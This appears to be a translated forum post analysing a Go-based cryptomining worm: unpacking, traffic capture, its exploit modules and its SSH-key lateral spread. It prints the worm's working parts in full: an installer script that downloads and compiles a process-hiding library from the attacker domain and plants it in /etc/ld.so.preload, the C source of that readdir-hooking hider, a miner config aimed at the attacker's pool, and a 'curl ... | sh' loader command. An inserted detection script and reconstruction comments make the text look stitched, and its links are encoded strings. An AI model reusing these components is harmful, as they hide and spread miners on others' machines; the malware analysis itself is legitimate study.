Reference link: 9f2K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3E0K9c8i4S2D9d9U0j5J5e0q4k6b7e0$3I4#2k6X3E0#2M7X3S2n7K9Y4M7`.
Last weekend I read Sangfor Qianlimu's malware analysis report and my eyes lit up: a malicious program that combines Windows && Linux && web traffic attacks tests an analyst's breadth of knowledge and also poses a serious challenge to the current security landscape. It also made me feel that binary and web have moved another step closer. Full-stack is not that far out of reach!



After UPX unpacking it turns out to be a Go sample. Find the main function and locate the network connection.

Domain + requested files are all stored in plaintext in the file.

Run the sample and look at the output (the program roughly checks for the malware's related modules and downloads whichever are missing according to the system information).

Requesting that file, you can see the malware author is very considerate and even tailored dual-platform attack modules for us: 017K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3#2Q4x3X3g2%4K9h3&6V1L8%4N6K6N6i4m8V1j5i4c8W2M7%4g2H3M7r3!0J5N6q4)9J5k6h3!0J5k6#2)9J5c8X3c8Q4x3V1k6%4K9h3&6V1L8%4N6K6N6i4m8V1j5i4c8W2N6U0q4Q4x3X3g2B7M7$3!0F1
We set a breakpoint before the network request in the main function and start debugging from there.

Break at the address with b *0x6681ef and look at the subsequent behavior.

Nice! It crashed (Captain, very spirited!). gdb crashes every single time I debug it. No time to waste, switch to another debugging approach. (Addendum: next time try ltrace and strace.)
Capture traffic with tcpdump, reconstruct the program's subsequent behavior from the traffic, and export the HTTP objects.

Well well, it downloaded the whole lot for me; we'll analyze the rest one by one.

(Whoa, it drops a PE on my Ubuntu box, impressive!! Are you going to install Wine for me too?)
Without further ado: Huorong Sword (火绒剑) && Procmon, the right medicine.

(Oh! Was this program frightened by me? Giving in under my might? Fine, I'll just take a look without stepping in.)
Drag it into IDA; it tells us a DLL is missing (confused face ?_?)

Find where that module is called dynamically


From past experience, most mining programs are modified or straight copies of GitHub open-source projects. Running strings to dump all the strings, I found the following configuration file
Then searching GitHub, I finally found its predecessor
1aeK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6^5L8i4u0A6k6#2)9J5c8Y4S2E0M7X3W2Y4
To avoid being recognized, the author even replaced the relevant fingerprints (nice, really went to the trouble)


In fact, the domain xmmrig.com doesn't exist at all!
The program installs every component you are missing for mining; really thinking of the customer!!!
The dbus program's predecessor is the open-source xmrig mining project on GitHub
It downloads the processhider.c module, compiles it, replaces /usr/local/lib/libc2.28.so, and adds it to /etc/ld.so.preload, so that every program run afterward loads the module in preload first
It filters out the processes kworkers | dbus | autoupdate, achieving process hiding
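As an added defender-side check (my code, not from the post or the sample), the Python script below looks for exactly this ld.so.preload trick on a Linux host: it flags non-system libraries in /etc/ld.so.preload and finds PIDs that exist in /proc but are missing from a readdir() listing, which is what the hooked readdir hides. The trusted directory list and the constructed inputs in the comments are assumptions.

```python
"""Detect an ld.so.preload process hider like the one this sample installs."""
import os

# Assumption: libraries outside these directories deserve a second look.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def suspicious_preload_entries(preload_text):
    """ld.so.preload entries outside the standard lib dirs
    (the sample adds /usr/local/lib/libc2.28.so there)."""
    entries = [ln.strip() for ln in preload_text.splitlines() if ln.strip()]
    return [e for e in entries if not e.startswith(TRUSTED_LIB_DIRS)]


def hidden_pids(listed_pids, probed_pids):
    """PIDs that exist (stat probe) but are missing from the readdir() listing."""
    return sorted(set(probed_pids) - set(listed_pids))


def listed_proc_pids():
    # os.listdir goes through readdir()/readdir64(), the calls the hook wraps,
    # and this Python process is itself subject to /etc/ld.so.preload.
    return [int(n) for n in os.listdir("/proc") if n.isdigit()]


def probed_proc_pids(pid_max):
    # stat() never enumerates the directory, so the hook cannot filter it.
    return [pid for pid in range(1, pid_max + 1) if os.path.exists("/proc/%d" % pid)]


def proc_comm(pid):
    try:
        with open("/proc/%d/comm" % pid) as f:
            return f.read().strip()
    except OSError:
        return "?"


if __name__ == "__main__":
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as f:
            for entry in suspicious_preload_entries(f.read()):
                print("suspicious preload entry:", entry)
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = int(f.read())
    probed = probed_proc_pids(pid_max)   # probe first, list second, then
    listed = listed_proc_pids()          # re-check, so a process that exited
    for pid in hidden_pids(listed, probed):  # in between is not reported
        if os.path.exists("/proc/%d" % pid):
            print("hidden pid %d (%s)" % (pid, proc_comm(pid)))
```

Run it as root on the suspect host; a statically linked copy of the interpreter is not needed, because the comparison deliberately relies on the hook being active in this process.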

(Well, the first thing it does is kill off the competition and other mining processes... so even malware is cutthroat. Collect this quickly; in future incident response run this script first)

Queries the egress IP, queries local SSH private keys and PEM certificate files, and finally checks known_hosts for previously connected hosts

Finally it uses the collected private keys to connect to other machines and make them download loader.sh, spreading worm-style and closing the loop
It has lateral movement capability; high risk
(Disclaimer: I haven't studied web vulnerabilities and Java in depth; corrections welcome)
First UPX unpacking, and it's another Go program. Look at the export table (found a big treasure)


Let's look at these scan modules in the main package one by one (of course there are many more attack modules; I won't embarrass myself)
xxljob (weak-password login to the admin backend?)
I can't determine which vulnerability this is; at first I thought it was XXL-JOB executor unauthorized access... but never found the related JSON string


mongo-express remote code execution (CVE-2019-10758)
Related link: 6b5K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6E0L8$3&6Y4L8#2)9J5k6r3g2^5M7s2u0W2M7%4y4Q4x3V1k6o6g2V1g2Q4x3X3b7J5x3o6p5&6i4K6u0V1x3e0l9%4y4e0S2Q4x3V1j5`.
Shiro deserialization (CVE-2016-4437)
Related link: 665K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6K6K9r3W2J5L8#2)9J5c8V1y4h3c8g2)9J5k6o6t1H3x3e0k6Q4x3X3b7@1y4o6x3%4i4K6u0r3
Tomcat password brute force
(played with this one before, hahaha)

Seeyon (Zhiyuan OA remote code execution)
Related link: 96cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7Y4S2F1i4K6u0W2L8X3g2@1i4K6u0r3L8X3g2%4M7#2)9J5c8U0j5J5x3q4)9J5k6h3S2@1L8h3H3`.
Seeyon (Zhiyuan OA arbitrary file upload)
Related link: a61K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8X3u0D9L8$3N6K6i4K6u0W2j5$3!0E0i4K6u0r3M7$3E0W2N6r3y4Z5M7r3H3@1L8X3g2Q4x3V1k6H3i4K6u0r3x3e0b7#2x3e0f1I4x3e0y4Q4x3X3g2Z5N6r3#2D9
Weaver OA (remote code execution)
Related link: 110K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8Y4q4I4i4K6g2X3y4o6p5%4y4e0M7J5z5o6m8Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5H3x3e0p5&6z5o6R3@1y4b7`.`.
Yonyou OA (remote command execution)
Related link: 4ccK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6T1L8r3!0Y4i4K6u0W2j5%4y4V1L8W2)9J5k6h3&6W2N6q4)9J5c8X3@1H3i4K6g2X3y4e0R3@1x3K6b7$3x3K6c8Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0r3k6r3g2@1j5h3W2D9M7#2)9J5c8U0p5I4y4K6f1@1y4K6p5$3y4l9`.`.
Docker daemon API unauthorized access
Related link: 324K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6$3N6h3I4Z5N6h3u0Q4x3X3g2G2M7X3N6Q4x3V1k6Q4x3U0y4Q4x3V1k6W2L8Y4k6A6M7X3!0F1L8h3g2F1N6s2y4Q4x3V1k6V1L8$3y4C8k6i4u0Q4x3V1k6#2L8X3q4#2N6r3S2G2M7X3W2*7k6h3c8Q4x3X3c8J5j5$3g2Q4x3V1j5`.


Struts2 (including S008\S013\S015\S016\S045\S046\S057)


Jenkins plugin remote code execution (uncertain)


WebLogic console interface remote code execution
fastjson 1.2.47 remote command execution
Find the main.DownLoadFile function and cross-reference it
Downloads the dubbo.jar module

Downloads the attack parameters corresponding to dubbo.jar


You can see that the command executed in the dubbo.jar configuration is
curl httlp://m.windowsupdatesupport.org/d/loader.sh | sh, for lateral propagation, i.e. spreading laterally through known web vulnerabilities

Decompiling the program shows it contains both quick detection and exp (attack) modules

The executed parameters are as above
That's as far as the analysis goes. The knowledge this sample covers is quite comprehensive, which makes it perfect for practice. In the past two years trojans targeting enterprise servers have grown ever more numerous and the gap between binary and web keeps narrowing. I hope fellow security folks take this as a warning: well-rounded development is the way forward
# Off-topic
I'm currently job hunting and hope this post can serve as a starting point for finding a job I like; location Beijing or Tianjin. Thanks!!
Web newbie; if the analysis has errors, discussion is welcome
```json
{
  "linux": [
    {"filename": "download",    "handle": "download", "url": "/download",    "ver": "20210002"},
    {"filename": "dbus",        "handle": "downrun",  "url": "/dbus",        "ver": "20210002"},
    {"filename": "hideproc.sh", "handle": "downrun",  "url": "/hideproc.sh", "ver": "20210002"},
    {"filename": "sshkey.sh",   "handle": "downrun",  "url": "/sshkey.sh",   "ver": "20210002"},
    {"filename": "autoupdate",  "handle": "downrun",  "url": "/autoupdate",  "ver": "20210012"},
    {"filename": "kworkers",    "handle": "update",   "url": "/kworkers",    "ver": "20210008"}
  ],
  "windows": [
    {"filename": "service.exe",    "handle": "update",   "url": "/service.exe",    "ver": "20210008"},
    {"filename": "inj.exe",        "handle": "download", "url": "/inj.exe",        "ver": "20210003"},
    {"filename": "runtime.dll",    "handle": "download", "url": "/runtime.dll",    "ver": "20210003"},
    {"filename": "autoupdate.exe", "handle": "downrun",  "url": "/autoupdate.exe", "ver": "20210012"},
    {"filename": "updater.exe",    "handle": "downrun",  "url": "/updater.exe",    "ver": "20210003"}
  ]
}
```
```json
{
  "api": {"id": null, "worker-id": null},
  "http": {
    "enabled": true, "host": "127.0.0.1", "port": 61254,
    "access-token": null, "restricted": true
  },
  "autosave": true,
  "background": true,
  "colors": true,
  "title": true,
  "randomx": {
    "init": -1, "init-avx2": -1, "mode": "auto", "1gb-pages": false,
    "rdmsr": true, "wrmsr": true, "cache_qos": false, "numa": true,
    "scratchpad_prefetch_mode": 1
  },
  "cpu": {
    "enabled": true, "cpu-affinity": 3, "threads": 3,
    "huge-pages": true, "huge-pages-jit": false, "hw-aes": null,
    "priority": null, "memory-pool": false, "yield": true,
    "max-threads-hint": 50, "asm": true, "argon2-impl": null,
    "astrobwt-max-size": 550, "astrobwt-avx2": false,
    "cn/0": false, "cn-lite/0": false
  },
  "opencl": {
    "enabled": false, "cache": true, "loader": null, "platform": "AMD",
    "adl": true, "cn/0": false, "cn-lite/0": false
  },
  "cuda": {
    "enabled": false, "loader": null, "nvml": true,
    "cn/0": false, "cn-lite/0": false
  },
  "donate-level": 0,
  "donate-over-proxy": 0,
  "log-file": null,
  "pools": [
    {
      "algo": null, "coin": null,
      "url": "m.windowsupdatesupport.org:443",
      "user": "x", "pass": "x", "rig-id": null,
      "nicehash": true, "keepalive": false, "enabled": true,
      "tls": true, "tls-fingerprint": null, "daemon": false,
      "socks5": null, "self-select": null, "submit-to-origin": false
    }
  ],
  "print-time": 60,
  "health-print-time": 60,
  "dmi": true,
  "retries": 5,
  "retry-pause": 5,
  "syslog": false,
  "tls": {
    "enabled": true, "protocols": null, "cert": null, "cert_key": null,
    "ciphers": null, "ciphersuites": null, "dhparam": null
  },
  "user-agent": null,
  "verbose": 0,
  "watch": true,
  "pause-on-battery": false,
  "pause-on-active": false
}
```
```sh
if [ "$EUID" -ne 0 ]
  then echo "Please run as root"
else
  if [ `grep libc2.28 /etc/ld.so.preload` ]
    then echo "hideproc already done!!"
  else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools" -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
    ls > /tmp/.1 2>&1
    grep libc2.28.so /tmp/.1 && echo > /etc/ld.so.preload
  fi
fi
```
```c
/* Headers the snippet needs to build as a shared object (added here;
 * the page's extraction dropped them along with the #define line). */
#define _GNU_SOURCE
#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "kworkers|dbus|autoupdate";

/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);

    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);

    return 1;
}

/* The macro header and the "##" token pastes below were stripped by the
 * page's extraction; they are reconstructed from the two invocations at the
 * bottom and from the original_<name> fragments that survived. */
#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);                \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            /* Note the strstr argument order: the entry is skipped     \
             * whenever process_name is a substring of the filter       \
             * string, so "bus" or "date" would be hidden as well.  */  \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strstr(process_to_filter, process_name)) {              \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
```